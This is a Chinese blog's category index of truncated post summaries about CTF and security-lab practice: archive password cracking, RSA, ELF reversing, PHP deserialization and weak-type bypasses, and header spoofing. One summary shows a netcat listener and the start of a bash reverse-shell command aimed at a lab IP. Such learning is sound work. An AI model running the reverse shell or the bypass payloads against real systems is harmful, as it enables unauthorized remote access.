随笔分类 - 杂乱
摘要:仅记录解题过程。 究极套娃题。 第一层、第二层用ARCHPR(azpr)工具破解: 第一层,Hex打开,看到末尾写着 6位纯数字密码不安全 知道爆破6位纯数字。 第二层,它给出了字典文件 用dictionary模式;虽然他默认用.dic 但实际上txt也行 。 第三层是明文攻击,即知道压缩包中的部分
阅读全文
摘要:web GameV4.0 签到题,直接js代码里找flag就行了。 crypto ezmath 是个web题(雾)。从这一题里,学到了一些python socket编程。 第一层是sha256相关的东西,爆破计算即可;注意控制字符数量(4重循环数字也挺多的),推荐用它源代码里的【string.asc
阅读全文
摘要:懒得找同余符号,统一打的=。 easy_rsa: 没啥好说的。 简单回顾下RSA: 生成两个大素数p、q生成p*q=n,phi=(p-1)*(q-1);取素数加密模数e,计算d=e-1 mod phi 公开e,n;存储d。 对于明文m,使用加密c = me (mod n);对于密文c,使用解密m =
阅读全文
摘要:一个elf文件。 扔到linux里运行,知道要找皮卡丘的伏特数。 ida里找到相应的字符串,再通过交叉引用找到对应函数: 知道其读入一个16进制无符号长整型数,并进行验证。 (unsigned long strtoul(const char *nptr,char **endptr,int base)
阅读全文
摘要:起因是hackgame的“flag助力大红包”题目。 题目不难,X-Forwarded-For写个脚本就搞定了。 但问题是,IP这块我其实完全不懂原理;如果X-Forwarded-For没用就直接G。 所以,简单的了解了一下IPv4。 IPv4使用32位地址,一般采用点分十进制写法(eg:192.1
阅读全文
摘要:web ——> python脚本编写练习。 直接访问发现全是乱码; 看包发现Content-Type里面没有charset=utf-8。 于是用python访问一下,用.encoding='utf-8'看.text: 大概知道怎么回事了。 写脚本: eval()在这里的作用是计算表达式(要求表达式必
阅读全文
摘要:***先说教训: (1)不要看到正则就走不动路;有些正则不一定能绕。 (2)__wakeup()漏洞在php5.6以上就被修复了; 本地复现各种题目时要注意环境。 ———————— 扫描,得到index.php~中源码;得知flag.php存在。 从底下看起;首先看似要绕一个正则,但实际上前面是$_
阅读全文
摘要:(国庆褪10天了 先水一篇) bybypass: payload:?anime_is_bae=hehellotherehoomanllotherehooman baby_phpserialize robots.txt看到flag和index.php~ 后者有源码: f12看 否则会漏东西 根据源码,
阅读全文
摘要:web。 题面: . 考察的实际上只是一个php的弱类型(string==0); payload:nickname={"key":0}(post) 关于json: 详细介绍见https://www.cnblogs.com/zhanghengscnc/p/8585403.html 感觉还是类似序列化和
阅读全文
摘要:两道web。 Babyhttp: 直接dirsearch,发现同时存在git和bak泄露;经验证,git的没用。 访问index.php.bak, 下载源码: 抓包,改包,发包即可。 get_or_lose: 一个绕过。还是花了不少时间的。 payload:?num=+03640 (因为正则过滤,h
阅读全文
摘要:(无内鬼 今日不想学了 水一篇) nc nc nc easyoverflow Intoverflow
阅读全文
摘要:(信安数基的quiz1写不出来 来这放题解泄愤) crypto类题。 题面 其加密的大致过程是,对明文flag中的逐个字符,随机使用三种加密方式: 第一种,对该字符进行sha256加密后以16进制形式输出。 第二种,将该字符转化为ascii码值,后进行指数运算+取模 加密。 第三种,依次有base3
阅读全文
摘要:crypto类题。 题面如下: 前面的代码给出了原理;后面的字符串第一行是print出的key,第二行是密文。 加密原理是,首先对table进行乱序处理,然后将明文flag按照(顺序table-->乱序key)的映射生成密文cipher。 以下是具体的python代码审计: list() 用于将元组
阅读全文
摘要:web类题。 访问题给页面,页面里没啥信息。抓包,发现: 访问它,发现是一个游戏。 F12之后看调试器里的js代码,发现: console.log("balabalabala"); 在控制台输出信息。 那一串由 ()!+[] 六个字符组成的编码是一种特定的javascript语法; 将其复制到本地j
阅读全文
摘要:part1:不求甚解的本地复现 攻击端Debian 10.x: 192.168.208.134 受害端Ubuntu : 192.168.208.135 攻击端打开(监听)某端口: 键入命令:【nc -lvp 8080】 受害端执行反弹shell: 键入命令:【bash -i >& /dev/tcp/
阅读全文
摘要:系统的http状态码知识,我是在《图解http里学习的》。 状态码的职责是告知从服务器端返回的请求结果。 分类如下: 2XX --> 成功 200 OK(一般情况) 204 No Content(无实体) 206 Partial Content(部分实体) 3XX --> 重定向 301 Moved
阅读全文